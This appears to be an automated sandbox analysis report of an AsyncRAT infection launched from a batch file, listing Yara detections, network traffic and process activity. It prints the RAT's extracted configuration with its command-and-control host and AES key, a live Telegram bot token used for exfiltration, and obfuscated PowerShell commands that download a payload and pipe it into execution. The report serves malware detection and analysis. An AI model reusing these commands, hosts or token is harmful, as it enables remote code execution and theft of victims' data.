                      Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "ducksex.ddnsfree.com", "Ports": "6161", "Version": "| CRACKED BY DEXTER-LY", "Autorun": "false", "Install_Folder": "UW1DWFNXQjRwTmZCcFN1WmRScE1TVEFQNkpZbmhIZWs=", "Install_File": "sM1ePJDTnlj3DtRAz7+dWOd5NGp5JQWsyrDZoPOlJQDTb6jNyWYXx3QMnyuazNtSs7TQ57FEdZieCqG12wLzhyExZMmCcwHl79x+3yuqL/o=", "AES_key": "QmCXSWB4pNfBpSuZdRpMSTAP6JYnhHek", "Mutex": "GG80pUNCFqeIBsLjHLFYJTVxcawRFwtyGo3CUv8xEr0FQ6fayqNqTizrEpLDnkgAkRFa6hxF8dqxu+8cWlEx829UEfZzHcDtfExYTn9JPBWbtOKZfw4jPt8BlpiKdSTcCPZcxhdww4SzQGSarZOzg+MYK1z13oJY6L5BAe2N9KV9U5sFSnNdnFxb3SV0JNc7e9PKmLRCiUgzHl8Q8taRcYgRrN3tD4w0o2FHstUZu246ixPat3z7xwdfym33m3Jstui7wHMCAjdaNH7DrBk5e0floJOx+2JRpCMlGENd9s5KiTp0ZHYtf1uTvLnza2eOL0IKBAJlscjt3Po1R2XyBJPSEp+aKzENQnfU45Bmab8RuRIzLbge67JD2+kLLP0Een/8+4UAdZz1Mj1xDhI2HumHhSzchUaWN7LCuXk6O3HsHv3d5e2sdrZkBmyJWGFQWGqN0clCQDqFOEFO5TcGZ0qL2A/obsKfDkuDm5s7FbE0cd6rw8PytF8ssXzTgg/lSrAXPNC03HV5KKrApYl04Tztmm/K0cWqyfE5TWWyn9ipBYoXOVgklba41/DMtIqIlCFGpMkkY8L8EdMLZRvslLCAiBnCm2SLqiBYivVWNIYDGfTOpAwchUWV3QfR5AtB8MgH5s4DJG7/RR4k2rNxE+dVRdMRR12ntFI+rGmuVQk=", "Certificate": "false", "ServerSignature": "true", "BDOS": "false", "Startup_Delay": "3", "Group": "null"}
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: unknownHTTPS traffic detected: 168.119.208.219:443 -> 192.168.2.8:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb00100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbE source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: ducksex.ddnsfree.com
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.8:49712 -> 178.208.169.197:6161
                      Source: global trafficHTTP traffic detected: GET /wblwxiun.rtw/pnilrykd.jpg HTTP/1.1Host: almamas.com.lyConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary=058ae0d9-f381-4383-b2eb-b7376aff61a3Host: api.telegram.orgContent-Length: 695695
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewASN Name: PHMGMT-AS1US PHMGMT-AS1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ipinfo.io
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 268Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: global trafficHTTP traffic detected: GET /wblwxiun.rtw/pnilrykd.jpg HTTP/1.1Host: almamas.com.lyConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: almamas.com.ly
                      Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: ducksex.ddnsfree.com
                      Source: unknownHTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 268Connection: Keep-Alive
                      Source: powershell.exe, 00000013.00000002.1823355430.000002576D0D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                      Source: powershell.exe, 00000013.00000002.1753014941.00000257032C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257028C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1825667488.000002576EEE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://localhost:3030/Service.asmx
                      Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000004.00000002.1868647268.000002E7CA7B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot$BotToken/sendMessage
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot$BotToken/sendPhoto
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto
                      Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.i
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missX
                      Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CB0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
                      Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownHTTPS traffic detected: 168.119.208.219:443 -> 192.168.2.8:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Pe4905VGl1.bat, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
                      Source: amsi64_2216.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 2216, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B16DAF64_2_00007FFB4B16DAF6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B16E8A24_2_00007FFB4B16E8A2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B178B0C4_2_00007FFB4B178B0C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B178B954_2_00007FFB4B178B95
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B1631AA4_2_00007FFB4B1631AA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFB4B1625AD19_2_00007FFB4B1625AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00CCE50821_2_00CCE508
                      Source: Pe4905VGl1.bat, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
                      Source: amsi64_2216.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
